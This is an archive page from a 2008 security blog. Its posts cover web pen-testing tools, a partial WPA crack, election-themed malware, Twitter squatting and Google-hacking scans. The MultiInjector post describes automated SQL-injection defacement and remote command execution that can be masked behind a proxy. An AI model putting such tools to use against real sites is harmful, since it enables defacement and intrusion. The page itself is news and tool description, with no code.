Archive | November, 2008

Samurai Web Testing Framework – Web Application Security LiveCD

Don't let your data go over to the Dark Side!


The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed. Our hope is that people who are interested in making this the best live CD for web testing will provide feedback for what they would like to see included on the CD.

You can download Samurai here:

samurai-0.3

Or read more here.


Posted in: Hacking Tools, Web Hacking

Tags: , , , , , , , , , , , ,

Posted in: Hacking Tools, Web Hacking | Add a Comment
Recent in Hacking Tools:
- The Backdoor Factory (BDF) – Patch Binaries With Shellcode
- Gdog – Python Windows Backdoor With Gmail Command & Control
- SPF (SpeedPhish Framework) – E-mail Phishing Toolkit

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,973,018 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,399,757 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 675,767 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


WPA Wi-Fi Encryption Scheme Partially Cracked

Don't let your data go over to the Dark Side!


Well WEP came down long ago, it was only a matter of time before the standard that succeeded it fell too – WPA. The big news last week was that WPA has been cracked finally, it’ll be discussed this week at the PacSec Conference.

After the insecurity of WEP was exposed the majority of routers and Wi-Fi devices default to WPA, so this may be a serious and widespread security issue. Especially as though the initial method and information is public, more refined and efficient cracking methods will come to light – of course we shall report on any WPA cracking tools that we come across.

Security researchers say they’ve developed a way to partially crack the Wi-Fi Protected Access (WPA) encryption standard used to protect data on many wireless networks.

The attack, described as the first practical attack on WPA, will be discussed at the PacSec conference in Tokyo next week. There, researcher Erik Tews will show how he was able to crack WPA encryption and read data being sent from a router to a laptop computer. The attack could also be used to send bogus information to a client connected to the router.

To do this, Tews and his co-researcher Martin Beck found a way to break the Temporal Key Integrity Protocol (TKIP) key, used by WPA, in a relatively short amount of time: 12 to 15 minutes, according to Dragos Ruiu, the PacSec conference’s organizer.

It’s a pretty fast attack on the TKIP, WEP cracking requires a relatively large amount of traffic to get hold of enough weak IVs to crack the WEP key.

If you can break WPA in 12-15 minutes, that’s impressive! It’s not a full key cracking method though, it only yields a temporary key and doesn’t give you full access to everything.

They have not, however, managed to crack the encryption keys used to secure data that goes from the PC to the router in this particular attack

Security experts had known that TKIP could be cracked using what’s known as a dictionary attack. Using massive computational resources, the attacker essentially cracks the encryption by making an extremely large number of educated guesses as to what key is being used to secure the wireless data.

The work of Tews and Beck does not involve a dictionary attack, however.

To pull off their trick, the researchers first discovered a way to trick a WPA router into sending them large amounts of data. This makes cracking the key easier, but this technique is also combined with a “mathematical breakthrough,” that lets them crack WPA much more quickly than any previous attempt, Ruiu said.

From what I understand it allows the attacked to basically hijack the ARP communications on the network, not the full data available.

So it could open up a router or edge device using WPA to be hijacked with ARP spoofing for some man-in-the-middle kind of attack.

Apparently an experimental implementation of the researchers’ attack has been introduced into a development version of the aircrack-ng tool.

Source: Computer World


Posted in: Exploits/Vulnerabilities, Wireless Hacking

Tags: , , , , , , , , , ,

Posted in: Exploits/Vulnerabilities, Wireless Hacking | Add a Comment
Recent in Exploits/Vulnerabilities:
- BeautifulPeople.com Leak Exposes 1.1M Extremely Private Records
- Apple Will Not Patch Windows QuickTime Vulnerabilities
- BADLOCK – Are ‘Branded’ Exploits Going Too Far?

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 234,327 views
- AJAX: Is your application secure enough? - 120,029 views
- eEye Launches 0-Day Exploit Tracker - 85,481 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


SARA – Security Auditor’s Research Assistant – Network Analysis Tool

Cybertroopers storming your ship?


This tool has been around for a LONG time in some form or another, some of you old-skool guys may remember a package called SATAN, this was the best semi-automatic security analysis tool around back then. From SATAN and it’s development came SARA, which is now in it’s 3rd generation.

Advanced Research’s philosophy relies heavily on software re-use. Rather than inventing a new module, SARA is adapted to interface to other community products. For instance, SARA interfaces with the popular Nmap package for superior “Operating System fingerprinting”. Also, SARA provides a transparent interface to SAMBA for SMB security analysis.

A recent addition to SARA is the ability to operate on a Windows 200* and Windows XP platforms. SARA relies on Cooperative Linux to provide the proper operating environment to operate as Windows process. This product is called coSARA.

The Security Auditor’s Research Assistant (SARA) is a third generation network security analysis tool that is:

  1. Operates under Unix, Linux, MAC OS/X or Windows (through coLinux) OS’.
  2. Integrates the National Vulnerability Database (NVD).
  3. Performs SQL injection tests.
  4. Performs exhaustive XSS tests
  5. Can adapt to many firewalled environments.
  6. Support remote self scan and API facilities.
  7. Used for CIS benchmark initiatives
  8. Plug-in facility for third party apps
  9. CVE standards support
  10. Enterprise search module
  11. Standalone or daemon mode
  12. Free-use open SATAN oriented license
  13. Updated twice a month (we try)
  14. User extension support
  15. Based on the SATAN model

The first generation assistant, the Security Administrator’s Tool for Analyzing Networks (SATAN) was developed in early 1995. It became the benchmark for network security analysis for several years. However, few updates were provided and the tool slowly became obsolete in the growing threat environment.

You can download SARA here:

sara-7.8.4.tgz (Linux)
cosara-7.4.1.exe (Windows)

Or read more here.


Posted in: Exploits/Vulnerabilities, Hacking Tools, Network Hacking

Tags: , , , , , , , , , , ,

Posted in: Exploits/Vulnerabilities, Hacking Tools, Network Hacking | Add a Comment
Recent in Exploits/Vulnerabilities:
- BeautifulPeople.com Leak Exposes 1.1M Extremely Private Records
- Apple Will Not Patch Windows QuickTime Vulnerabilities
- BADLOCK – Are ‘Branded’ Exploits Going Too Far?

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 234,327 views
- AJAX: Is your application secure enough? - 120,029 views
- eEye Launches 0-Day Exploit Tracker - 85,481 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Malware Authors Jumping on the Obama Bandwagon

Cybertroopers storming your ship?


No surprise here, the malware authors are leveraging on the social engineering aspect of the US presidential elections.

In less than half a day Google Adwords adverts and custom malware was popping up conning users into a sense of security by using Obama’s name.

Malware purveyors have wasted no time capitalizing on Barack Obama’s landslide victory in the US presidential race. Within 12 hours of his acceptance speech Tuesday night, net users were being treated to scams involving Google AdWords and prodigious volumes of spam.

The spam comes masked as dispatches from legitimate news sources, including the BBC and CNN, and invite readers to click a link to view a video of Obama accepting his country’s vote. Those who take the bait are sent to a spoof page of the news site that claims they need to update their Adobe Flash Player before viewing the speech.

It seems to be a generic trojan/rootkit aiming for banking details, it’s just a new vector for installation.

I guess a lot of people will fall for it though with the election fever hitting all around the World, not just in USA. Everyone is going Obama crazy!

In fact, Adobe_flash9.exe installs the notorious Trojan-PSW:W32/Papras.CL, according to anti-virus provider F-Secure. Earlier Wednesday, just 14 of the 36 major anti-virus programs detected the trojan, according to this analysis from VirusTotal. Once installed, the malware, which cloaks itself in a rootkit, logs passwords for bank sites and other sensitive information and sends them to a server located in Ukraine.

The fraudulent news sites are being hosted on a fast-flux network of infected machines, according to this analysis by the CyberCrime & Doing Time blog. Cloudmark, a company that provides spam filtering service, has already seen more than 10 million of the spam messages, according to the Zero Day blog.

Anyway just let the non-tech savvy amongst the people you know that this is going on and that they are likely to get e-mails or messages about Obama pretending to be from legitimate sources.

Under no circumstance should they follow the link and especially don’t install any flash or other software updates from such sites.

Source: The Register


Posted in: Malware, Social Engineering, Spammers & Scammers

Tags: , , , , , , ,

Posted in: Malware, Social Engineering, Spammers & Scammers | Add a Comment
Recent in Malware:
- PEiD – Detect PE Packers, Cryptors & Compilers
- Mac OS X Ransomware KeRanger Is Linux Encoder Trojan
- Veil Framework – Antivirus Evasion Framework

Related Posts:

Most Read in Malware:
- Nasty Trojan Zeus Evades Antivirus Software - 77,474 views
- Hospital Hacker GhostExodus Owns Himself – Arrested - 47,594 views
- US considers banning DRM rootkits – Sony BMG - 44,979 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


MultiInjector – Automated Stealth SQL Injection Tool

Don't let your data go over to the Dark Side!


MultiInjector claims to the first configurable automatic website defacement software, I’m not sure if that’s a good thing – or a bad thing.

But well here it is anyway.

Features

  • Receives a list of URLs as input
  • Recognizes the parameterized URLs from the list
  • Fuzzes all URL parameters to concatenate the desired payload once an injection is successful
  • Automatic defacement – you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun
  • OS command execution – remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user
  • Configurable parallel connections exponentially speed up the attack process – one payload, multiple targets, simultaneous attacks
  • Optional use of an HTTP proxy to mask the origin of the attacks

The author highly recommend running a HTTP sniffer such as IEInspector HTTP Analyzer in order to see all attack requests going out to the targets.

Requirements

  • Python >= 2.4
  • Pycurl (compatible with the above version of Python)
  • Psyco (compatible with the above version of Python)

You can download MultiInjector v0.2 here:

MultiInjector.py

Or read more here.


Posted in: Database Hacking, Hacking Tools, Web Hacking

Tags: , , , , , , , ,

Posted in: Database Hacking, Hacking Tools, Web Hacking | Add a Comment
Recent in Database Hacking:
- Onapsis Bizploit v1.50 – SAP Penetration Testing Framework
- OAT – Oracle Auditing Tools For Database Security
- ODAT (Oracle Database Attacking Tool) – Test Oracle Database Security

Related Posts:

Most Read in Database Hacking:
- Pangolin – Automatic SQL Injection Tool - 76,161 views
- bsqlbf 1.1 – Blind SQL Injection Tool - 54,336 views
- SQLBrute – SQL Injection Brute Force Tool - 40,713 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Twitter Squatting – The New Domain Jacking?

Cybertroopers storming your ship?


It seems the latest target for spammers, opportunists and those into Domain Squatting is the registration of interesting or possibly valuable Twitter usernames.

Twitter has exploded recently as a new ‘micro-blogging’ platform and it works really well, especially when combined with more traditional blogging and the host of tools that have been build around Twitter to enable you to find tweets about specific topics or events easily.

Now Twitter has created a new supply of valuable “names”: Twitter IDs. They take the form of twitter.com/stiennon for instance. Have you signed up for your free Twitter ID? Do you own your surname? Company name? Brand identity?

Is there evidence of Twitter squatting (squitting?) Let’s check. Yup, every single-letter TwitID is taken. Some are legitimate (Check out “S” for instance, that is a cool personal email assistant service) but X, Y, and Z are place holders. How about common words? Garage, wow, war, warcraft, Crisco, Coke, Pepsi, Nike, and Chevrolet are all taken. My guess is that Twitter squatters have grabbed all of these in the hopes that they will be worth selling in the not too distant future. Of course the legitimate holders of brands can sue for them and Twitter can just turn them over if asked. But, because the investment and risk for the squatter is zero, you are going to see the rapid evaporation of available Twitter IDs.

I wonder if this will be the next lucrative business, people registered thousands of Twitter usernames and speculating with them.

Imagine if your name or company name is taken, it’s gonna be cheaper than litigation to get it back to just pay the guy a few hundred or a few thousand dollars. If you haven’t gotten a Twitter ID yet I suggest you bag your name now before someone else does.

How to protect your own brand? Immediately go to Twitter.com and determine if your name is available. Get it while you can. While you are at it, reserve all of the names associated with your brand. You may decide that any domain you have invested in should have its Twitter ID. It is the domain name squatters who will jump on this new land grab first after all. Reserving multiple Twitter IDs is easy. Twitter attempts to limit reservations by requiring a unique email address for each sign-up. That is circumvented by using the Google “plus sign” email trick. Simply append something (your new Twitter ID for instance) to your Google email address like stiennon+itharvest@gmail.com. Gmail treats that as stiennon@gmail.com but Twitter thinks it is unique. I expect Twitter to fix this flaw shortly. They may even require email confirmation.

So go and get registering, especially if you have anything to do with the online presence of a real business – go and register the business name and derivatives now. You could save yourself some money when later the CTO or CEO thinks blogging and Twittering may really boost your brand equity.

Who knows? Better safe than sorry right.

Source: Network World


Posted in: Phishing, Spammers & Scammers

Tags: , , , , , , , , ,

Posted in: Phishing, Spammers & Scammers | Add a Comment
Recent in Phishing:
- Phishing Frenzy – E-mail Phishing Framework
- Gophish – Open-Source Phishing Framework
- sptoolkit Rebirth – Simple Phishing Toolkit

Related Posts:

Most Read in Phishing:
- Twitter DM Phishing Scam - 28,943 views
- yahoo password grabber - 19,126 views
- Digital Underground Offering Cheap Botnets For Hire - 15,432 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Gooscan – Automated Google Hacking Tool

Don't let your data go over to the Dark Side!


Whilst reading an article the other day I saw this mentioned and realised I haven’t written about this yet either, although I have written about the similar tool Goolag.

What is Gooscan?

Gooscan is a tool that automates queries against Google search appliances, but with a twist. These particular queries are designed to find potential vulnerabilities on web pages. Think “cgi scanner” that never communicates directly with the target web server, since all queries are answered by a Google appliance, not by the target itself.

Who is it written for?

Security professionals: This tool serves as a front-end for an external web server assessment and aids in the “information gathering” phase of a vulnerability assessment.

Web server administrators: This tool helps to discover what the web community may already know about you thanks to Google.

Is this tool legal?

From Google ToS – “You may not send automated queries of any sort to Google’s system without express permission in advance from Google.”

This means that you should not use this tool to query Google without advance express permission. Google appliances, however, do not have these limitations. You should, however, obtain advance express permission from the owner or maintainer of the Google appliance before searching it with
any automated tool for various legal and moral reasons.

The author wrote this tool not to violate Google’s terms of service (ToS), but to raise the awareness of the web security community that a ToS may not discourage the bad guys from writing and running a tool like this for malicious purposes. To that end, only use this tool to query _appliances_ unless you are prepared to face the (as yet unquantified) wrath of Google.

Why the proxy feature?

Many companies can only reach the Internet by way of an internal proxy server. When conducting an authorized assessment, it may be necessary to bounce queries of of a web proxy instead of off the Google appliance directly.

You can download Gooscan v1.0 here:

Gooscan v1.0


Posted in: Hacking Tools, Web Hacking

Tags: , , , , , , , ,

Posted in: Hacking Tools, Web Hacking | Add a Comment
Recent in Hacking Tools:
- The Backdoor Factory (BDF) – Patch Binaries With Shellcode
- Gdog – Python Windows Backdoor With Gmail Command & Control
- SPF (SpeedPhish Framework) – E-mail Phishing Toolkit

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,973,018 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,399,757 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 675,767 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95